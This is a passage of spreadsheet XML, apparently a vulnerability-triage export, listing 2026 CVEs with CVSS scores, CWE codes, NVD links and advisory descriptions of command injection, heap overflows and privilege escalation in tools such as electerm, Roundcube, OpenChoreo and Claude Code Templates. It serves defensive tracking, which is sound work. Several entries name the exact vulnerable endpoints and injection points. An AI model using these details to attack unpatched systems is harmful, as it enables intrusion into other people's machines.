        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E934" s="5" t="inlineStr"/>
      <c r="F934" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="inlineStr"/>
      <c r="I934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L934" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73023</t>
        </is>
      </c>
      <c r="C935" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E935" s="5" t="inlineStr"/>
      <c r="F935" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G935" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H935" s="5" t="inlineStr"/>
      <c r="I935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L935" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="C936" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E936" s="5" t="inlineStr"/>
      <c r="F936" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="inlineStr"/>
      <c r="I936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L936" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73222</t>
        </is>
      </c>
      <c r="C937" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E937" s="5" t="inlineStr"/>
      <c r="F937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G937" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H937" s="5" t="inlineStr"/>
      <c r="I937" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-78</t>
        </is>
      </c>
      <c r="L937" s="5" t="inlineStr">
        <is>
          <t>Claude Code Templates is a CLI tool for configuring and monitoring Claude Code. Prior to 1.29.4, the Claude Code Studio server launched by the --studio option in cli-tool/src/sandbox-server.js binds to all interfaces on port 3444, permits cross-origin requests, and requires no authentication. The POST /api/execute endpoint passes the prompt request-body field to executeLocalTask(), and POST /api/install-agent passes the agentName request-body field to a child process. The same unsafe agent field path is reachable from /api/execute through checkAndInstallAgent(). These attacker-controlled values reach child_process.spawn() with shell execution enabled, causing Node.js to construct a shell command in which metacharacters are interpreted. An attacker who can reach the port directly, or who convinces a developer running Studio to visit a malicious website, can execute arbitrary operating-system commands with the developer's privileges and compromise source code, credentials, and local data. This issue is fixed in version 1.29.4.</t>
        </is>
      </c>
      <c r="M937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73222</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73224</t>
        </is>
      </c>
      <c r="C938" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E938" s="5" t="inlineStr"/>
      <c r="F938" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="inlineStr"/>
      <c r="I938" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L938" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious FTP or SFTP server to execute arbitrary commands when a user downloads a crafted folder and invokes Properties and Calculate Size because calcLocal in src/client/components/sftp/file-info-modal.jsx inserts the server-controlled folder name into a du -sh shell command without safely escaping single quotes. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73224</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73226</t>
        </is>
      </c>
      <c r="C939" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E939" s="5" t="inlineStr"/>
      <c r="F939" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="inlineStr"/>
      <c r="I939" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L939" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.186, electerm allows an authenticated WebSocket client to invoke unintended internal functions through client-controlled func values in upgrade-func in src/app/server/dispatch-center.js and handleFs in src/app/server/fs.js, exposing Upgrade and fsExport methods that can execute commands, open files, mutate the filesystem, or terminate the process. This issue is fixed in version 3.15.186.</t>
        </is>
      </c>
      <c r="M939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73226</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73284</t>
        </is>
      </c>
      <c r="C940" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E940" s="5" t="inlineStr"/>
      <c r="F940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="inlineStr"/>
      <c r="I940" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L940" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. RustFS AddServiceAccount in rustfs/src/admin/handlers/service_account.rs accepts an attacker-controlled target_user after only checking CreateServiceAccountAdminAction, passes it to new_service_account, and prepare_service_account_auth sets is_owner for the resulting root-parent service account. This issue is fixed in version 1.0.0-beta.11.</t>
        </is>
      </c>
      <c r="M940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73284</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73293</t>
        </is>
      </c>
      <c r="C941" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E941" s="5" t="inlineStr"/>
      <c r="F941" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="inlineStr"/>
      <c r="I941" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L941" s="5" t="inlineStr">
        <is>
          <t>Semaphore UI is a web interface for managing DevOps tools.  Prior to 2.18.19 and from 2.19.0-alpha3 until 2.19.5-beta5, ProjectMiddleware and GetProjectOrGlobalRoleBySlug allow a project manager to use POST /api/project/{id}/roles to create a custom manager role with permission bitmask 15, overriding the built-in manager permissions and granting CanUpdateProject and CanManageProjectUsers owner capabilities. This issue is fixed in versions 2.18.19 and 2.19.5-beta5.</t>
        </is>
      </c>
      <c r="M941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73293</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73305</t>
        </is>
      </c>
      <c r="C942" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E942" s="5" t="inlineStr"/>
      <c r="F942" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="inlineStr"/>
      <c r="I942" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L942" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.24, POST /api/public/v1/roles/assign called validateGlobalRoleUpdate without checking appBuilder.appId or role.appId in packages/server/src/api/controllers/public/globalRoleValidation.ts. An app-scoped builder could scope the request to an app they control and then grant themselves builder access or an arbitrary role in another app, exposing that app data, datasource configuration, and automations. This issue is fixed in version 3.39.24.</t>
        </is>
      </c>
      <c r="M942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73305</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73667</t>
        </is>
      </c>
      <c r="C943" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E943" s="5" t="inlineStr"/>
      <c r="F943" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G943" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H943" s="5" t="inlineStr"/>
      <c r="I943" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L943" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.4, 1.1.4, and 1.2.0-rc.2, OpenChoreo Workflow Plane templates under samples/getting-started/workflow-templates/ interpolated developer-controlled workflow parameters into shell program text executed through sh -c instead of passing the values through container.env, allowing arbitrary commands to run in workflow pods while affected privileged Podman templates lacked hostUsers: false. This issue is fixed in versions 1.0.4, 1.1.4, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73667</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73753</t>
        </is>
      </c>
      <c r="C944" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E944" s="5" t="inlineStr"/>
      <c r="F944" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944"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I944" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L944" s="5" t="inlineStr">
        <is>
          <t>Exploitation through affected command-line operations could allow an authenticated low-privileged user to execute arbitrary commands as a privileged user on the underlying operating system.</t>
        </is>
      </c>
      <c r="M944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73753</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73763</t>
        </is>
      </c>
      <c r="C945" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E945" s="5" t="inlineStr"/>
      <c r="F945" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945"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I945" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L945" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in a management component that could allow an unauthenticated adjacent attacker to execute arbitrary commands. Successful exploitation could result in remote execution of arbitrary commands in the context of the affected utility.</t>
        </is>
      </c>
      <c r="M945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73763</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73784</t>
        </is>
      </c>
      <c r="C946" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E946" s="5" t="inlineStr"/>
      <c r="F946" s="5" t="inlineStr"/>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="inlineStr"/>
      <c r="I946" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L946" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall products could be exploited to tamper SAML response, allowing an attacker to impersonate another user.</t>
        </is>
      </c>
      <c r="M946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73784</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73841</t>
        </is>
      </c>
      <c r="C947" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E947" s="5" t="inlineStr"/>
      <c r="F947" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G947" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H947" s="5" t="inlineStr"/>
      <c r="I947" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L947" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.1.6 and 1.2.3, internal/openchoreo-api/api/handlers/exec.go and internal/openchoreo-api/api/handlers/wirelogs.go authorize component:exec and wirelogs:view using the caller-supplied project query parameter instead of comp.Spec.Owner.ProjectName, allowing a user with a project-scoped grant to execute commands in and read wirelogs from components owned by other projects in the same namespace. This vulnerability is fixed in 1.1.6 and 1.2.3.</t>
        </is>
      </c>
      <c r="M947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73841</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74997</t>
        </is>
      </c>
      <c r="C948" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E948" s="5" t="inlineStr"/>
      <c r="F948" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I948" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L948" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, the cmd_learn driver of the markasjunk plugin is subject to remote code execution via crafted placeholder replacement values. This issue only affects Roundcube instances using the markasjunk plugin with its cmd_learn driver.</t>
        </is>
      </c>
      <c r="M948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74997</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75007</t>
        </is>
      </c>
      <c r="C949" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E949" s="5" t="inlineStr"/>
      <c r="F949" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I949" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L949" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, the LDAP search filter was subject to injection via unescaped %u/%fu/%d substitution, which may lead to information disclosure or privilege escalation.</t>
        </is>
      </c>
      <c r="M949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75007</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75161</t>
        </is>
      </c>
      <c r="C950" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E950" s="5" t="inlineStr"/>
      <c r="F950" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="inlineStr"/>
      <c r="I950" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L950" s="5" t="inlineStr">
        <is>
          <t>An issue in the ugw-restart method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to inject arbitrary code into the dpcheck system utility executed as root.</t>
        </is>
      </c>
      <c r="M950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75161</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75166</t>
        </is>
      </c>
      <c r="C951" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E951" s="5" t="inlineStr"/>
      <c r="F951" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="inlineStr"/>
      <c r="I951" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-276</t>
        </is>
      </c>
      <c r="L951" s="5" t="inlineStr">
        <is>
          <t>Insecure Permission vulnerability in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows the low-privileged service user to execute /usr/bin/tcpdump as root without a password. By leveraging the tcpdump -z option, an authenticated attacker can achieve arbitrary command execution.</t>
        </is>
      </c>
      <c r="M951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75166</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75169</t>
        </is>
      </c>
      <c r="C952" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E952" s="5" t="inlineStr"/>
      <c r="F952" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="inlineStr"/>
      <c r="I952" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L952" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in /cgi-bin/ugwupload.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with Admin role to upload files with arbitrary content to hardcoded paths.</t>
        </is>
      </c>
      <c r="M952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75169</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75339</t>
        </is>
      </c>
      <c r="C953" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E953" s="5" t="inlineStr"/>
      <c r="F953" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="inlineStr"/>
      <c r="I953" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L953" s="5" t="inlineStr">
        <is>
          <t>The storage endpoint /storage/upload of cjbi admin3 v3.0.0 are missing permission checks. /Any logged-in user can upload arbitrary files, and any anonymous attacker can download them.</t>
        </is>
      </c>
      <c r="M953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75339</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75624</t>
        </is>
      </c>
      <c r="C954" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E954" s="5" t="inlineStr"/>
      <c r="F954" s="5" t="inlineStr"/>
      <c r="G954" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H954" s="5" t="inlineStr"/>
      <c r="I954" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L954" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.27 could allow a remote authenticated attacker to bypass security restrictions due to incorrect authorization.</t>
        </is>
      </c>
      <c r="M954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75624</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75777</t>
        </is>
      </c>
      <c r="C955" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E955" s="5" t="inlineStr"/>
      <c r="F955" s="5" t="inlineStr"/>
      <c r="G955" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H955" s="5" t="inlineStr"/>
      <c r="I955" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L955" s="5" t="inlineStr">
        <is>
          <t>IBM Aspera Enterprise WebApps 1.0.0 through 1.0.5 could allow a local attacker to escape container protections due to unrestricted system calls being permitted within the container.</t>
        </is>
      </c>
      <c r="M955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75777</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76059</t>
        </is>
      </c>
      <c r="C956" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E956" s="5" t="inlineStr"/>
      <c r="F956" s="5" t="inlineStr"/>
      <c r="G956" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H956" s="5" t="inlineStr"/>
      <c r="I956" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
